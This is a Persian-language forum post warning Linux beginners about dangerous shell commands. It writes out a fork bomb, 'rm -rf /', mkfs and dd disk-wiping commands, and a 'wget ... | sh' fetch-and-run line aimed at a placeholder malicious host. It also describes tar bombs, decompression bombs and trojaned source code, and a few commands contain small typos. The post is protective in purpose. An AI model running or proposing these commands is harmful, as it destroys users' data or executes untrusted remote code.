شما عضو این انجمن نبوده یا وارد نشده اید. لطفا برای مشاهده کامل انجمن و استفاده از آن وارد شوید یا ثبت نام کنید .

امتیاز موضوع:
  • 52 رأی - میانگین امتیازات: 3.23
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
کلمات کلیدی
آنها باید باشید دستورات مراقب شل ترمینال خطرناک و کدهای که لینوکس

دستورات و کدهای خطرناک لینوکس که باید مراقب آنها باشید
#1
فرامین ترمینال یا شل در لینوکس بسیار قدرتمند هستند و تنها یک فرمان ساده می‎تواند منجر به حذف یک فایل، فولدر یا موارد خطرات دیگر شود. در برخی از موارد لینوکس حتی برای دریافت تاییدیه اجرای یک فرمان هیچ سوالی نمی‎پرسد و با اجرای مستقیم آن باعث از بین رفتن اطلاعات ارزشمند شما می‎شود.
معمولا تازه کاران لینوکس برای یادگیری فرامین به وب مراجعه می‎کنند و اگر منابع مورد اطمینان نباشد ممکن است با پیشنهاداتی برای اجرای برخی از فرامین توسط برخی از کاربران مواجه شوند که برای شوخی و سرگرمی‎ ارسال شده‎اند، اما برای این تازه کاران نه تنها شوخی نیست بلکه باعث دردسر آنها می‎شود.
نکته مهم این که بعضی از این فرامین تنها در صورت استفاده شدن با پیشوند sudo در اوبونتو می‎توانند خطرناک باشند. در توزیع‎های دیگر لینوکس نیز خیلی از فرامین تنها در صورتی که به عنوان فرامین ریشه اجرا شوند خطرناک هستند.

ما برخی از فرامین لینوکس که می‎تواند برای سیستم شما مضر باشد را گردآوری کرده‎ایم تا به شما کمک کند از آنها دوری کنید. به یاد داشته باشید كه برخی از آنها واقعا خطرناک هستند و حتی می‎توانند به روش‎های مختلف برای ایجاد دستورات جدید که صدمات بیشتری ایجاد می‎کند تغییر داده شوند.


1. فرمان Fork Bomb در لینوکس
: (){ :|: & };: که با عنوان Fork Bomb نیز شناخته می‎شود یک حمله انکار سرویس در مقابل سیستم لینوکس است. : (){ :|: & };: یک تابع bash است. به محض اجرا خود را چندین بار تکرار می‎کند تا سیستم از کار بیافتد.
شما برای رهایی از آن تنها باید سیستم را ری‎استارت کنید. بنابراین در زمان اجرای این فرمان در پوسته لینوکس خود مراقب باشید.

2. فرمان mv folder/dev/null
mv folder/dev/null یکی دیگر از فرامین خطرناک است. Dev/null یا null device یک فایل دیوایس است که تمام داده‎های نوشته شده روی آن را پاک می‎کند، اما گزارش می‎دهد که عملیات نوشتن با موفقیت انجام شده است. از این فرمان به عنوان bit bucked یا black hole نیز یاد می‎شود.

3. فرمان rm –rf
فرمان rm –rf یک راه سریع برای حذف یک فولدر و محتویات درون آن در سیستم عامل لینوکس است. اگر شما روش صحیح استفاده از آن را بلد نباشید ممکن است به یک فرمان خطرات برای سیستم تبدیل شود. معروف‎ترین ترکیبات و گزینه‎های مورد استفاده با فرمان rm –rf شامل این موارد هستند:
  • فرمان rm برای پاک کردن فایل‎ها در سیستم لینوکس استفاده می‎شود.
  • فرمان rm –f فایل‎های فقط خواندنی موجود در یک فولدر را بدون هیچ پیغام هشدارهای حذف می‎کند.
  • فرمان rm –r محتوای یک فولدر را حذف می‎کند.
  • فرمان rm –d برای پاک کردن یک دایرکتوری خالی استفاده می‎شود و اگر این دایرکتوری خالی نباشد از حذف آن اجتناب می‎کند.
  • فرمان rm -rf/ برای حذف اجباری (حتی اگر در برابر بازنويسی محافظت شده باشد) محتوای دایرکتوری ریشه و زیر فولدرهای آن استفاده می‎شود.
  • فرمان rm -rf* برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده می‎شود.
  • فرمان rm -rf. نیز برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده می‎شود. می‎توان از فرمان rm -r.[^.]* نیز استفاده کرد.
  • فرمان rm –i برای حذف فایل‎ها و فولدرها استفاده می‎شود اما قبل از حذف با پیغام به شما هشدار می‎دهد.
4. فرمان mkfs
اگر شما هدفmkfs  را به درستی نشناسید می‎تواند به یک فرمان خطرناک تبدیل شود. هر چیزی که بعد از mkfs نوشته می‎شود فرمت شده و با سیستم فایل لینوکس خالی جایگزین می‎شود.
تمام فرامین فهرست شده در زیر هارد درايو شما را فرمت خواهد کرد و به مجوز مدیریتی نیاز دارد:
  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
فرمان mkfs.cramfs همان کار فرامین بالا را انجام می‎دهد اما برای اجرا شدن به مجوز مدیریتی احتیاج ندارد.

5. بمب Tar
از فرمان Tar برای جمع آوری چندین فایل داخل یک فایل واحد (یا فایل آرشیو) با فرمت  .tar استفاده می‎شود. اما با این فرمان می‎توان یک بمب Tape Archive (Tar) ساخت.
در یک فایل آرشیو که با هزاران یا حتی میلیون‎ها فایل هم نام با فایل‎های موجود در دایرکتوری جاری پر شده است در زمان استخراج این فایل‎ها با مشکل مواجه خواهید شد. شما می‎توانید با ساخت یک دایرکتوری محافظ در زمان دریافت یک فایل tar از گرفتار شدن در وضعیت بمب tar جلوگیری کنید.
اگر یک فایل tar به این وضعیت دچار شد شما به راحتی با حذف این دایرکتوری تازه ساخته شده می‎توانید از دست آن خلاص شوید. یک راه دیگر برای جلوگیری از انفجار بمب tar استفاده از گزينه –t برای فهرست کردن تمام محتوای یک فایل tar است که اطلاعاتی در مورد محتوای داخل این فایل tar در اختیار شما قرار می‎دهد.

6. فرمان dd
از فرمان dd برای کپی و تبدیل کردن پارتيشن‎های هارد دیسک استفاده می‎شود. اما اگر شما مقصد را به درستی تعیین نکنید می‎تواند آسیب رسان شود.
این فرمان ممکن است به یکی از این اشکال باشد:
  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
فرمان زير نیز کل هارد درایو primary را اصطلاحا صفر می‎کند:

dd if=/dev/zero of=/dev/had

7. کد Shell Script
شما ممکن است با دانلود و اجرای یک اسکریپت پوسته مخرب قربانی آن شوید. این اسکریپت ممکن است شامل کدهای مخرب و خطرناک در داخل خود باشد. فرمت این فرمان ممکن است چیزی شبیه به این باشد:

wget http://some_malicious_source -O- | sh

فرمان wget این اسکریپت را دانلود می‎کند و sh باعث اجرا شدن فایل دانلود شده می‎شود.

8. کدهای منبع مخرب
ممکن است شخصی به شما یک کد منبع را پیشنهاد کند و از شما بخواهد آن را کامپایل کنید. شاید در ظاهر این کد طبیعی به نظر برسد اما در واقع کدهای مخرب داخل حجم زیادی از کدهای منبع پنهان شده است و می‎تواند به سیستم شما صدمه بزند. برای جلوگیری از قربانی شدن توسط این نوع از حملات، این کدهای منبع پیشنهادی را تنها از منابع معتبر و شناخته شده قبول کنید.

9. بمب Decompression
شما ممکن است یک فایل فشرده شده دریافت کنید که در ظاهر حجم زیادی ندارد اما محتوای درون آن با سطح فشرده سازی بالا پر شده است. به محض این که این فایل را از حالت فشرده خارج می‎کنید حجم انبوهی از داده هارد درايو شما را پر کرده و عملکرد سیستم شما را پایین می‎آورد. برای جلوگیری از این وضعیت همیشه داده‎های مورد نظر خود را از منابع معتبر دریافت کنید.



پاسخ
 سپاس شده توسط farnaz ، saman ، سحر ، نگار ، shahram20 ، hoboot
#2
پست خوبی بود مرسی
پاسخ


موضوع‌های مشابه…
موضوع نویسنده پاسخ بازدید آخرین ارسال
  بازیابی رمز روت لینوکس saberi 1 1,384 ۰۱/۴/۲۵، ۱۲:۱۱ عصر
آخرین ارسال: هانیه یزدانی
  لینوکس چیست؟ Mahantara9 1 958 ۹۹/۹/۳، ۰۵:۰۷ عصر
آخرین ارسال: davin123
  اضافه کردن چند آدرس IP به سرور لینوکس saberi 2 2,965 ۹۸/۸/۱۶، ۰۸:۱۵ عصر
آخرین ارسال: hadiam
  آسیب پذیری تخریب حافظه در کامپوننتی مربوط به هسته لینوکس mesterweb 0 1,315 ۹۷/۱۱/۱، ۱۰:۵۸ صبح
آخرین ارسال: mesterweb
  سیستم عامل لینوکس چگونه به صرفه‌جویی اقتصادی کمک می‌کند farnaz 0 1,254 ۹۶/۹/۲۶، ۰۴:۴۶ صبح
آخرین ارسال: farnaz
  8 دلیل برای استفاده از لینوکس به جای سیستم عامل های ویندوز و مک mesterweb 0 1,862 ۹۶/۷/۲۶، ۰۴:۴۸ صبح
آخرین ارسال: mesterweb
  آموزش حذف پسورد یوزر root در لینوکس saberi 0 2,695 ۹۶/۳/۱۶، ۰۳:۴۹ صبح
آخرین ارسال: saberi
  گرفتن بکاپ از کل یک دایرکتوری در لینوکس saberi 0 1,815 ۹۵/۷/۱۸، ۱۱:۰۰ صبح
آخرین ارسال: saberi
  فشرده سازی دایرکتوری و فایل در لینوکس saberi 0 1,744 ۹۵/۷/۱۸، ۱۰:۳۳ صبح
آخرین ارسال: saberi
  چگونه در چند ثانیه تمام اپلیکیشن‌ ها را در لینوکس بروزرسانی کنیم mesterweb 0 2,011 ۹۵/۲/۴، ۰۸:۵۳ عصر
آخرین ارسال: mesterweb

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 2 مهمان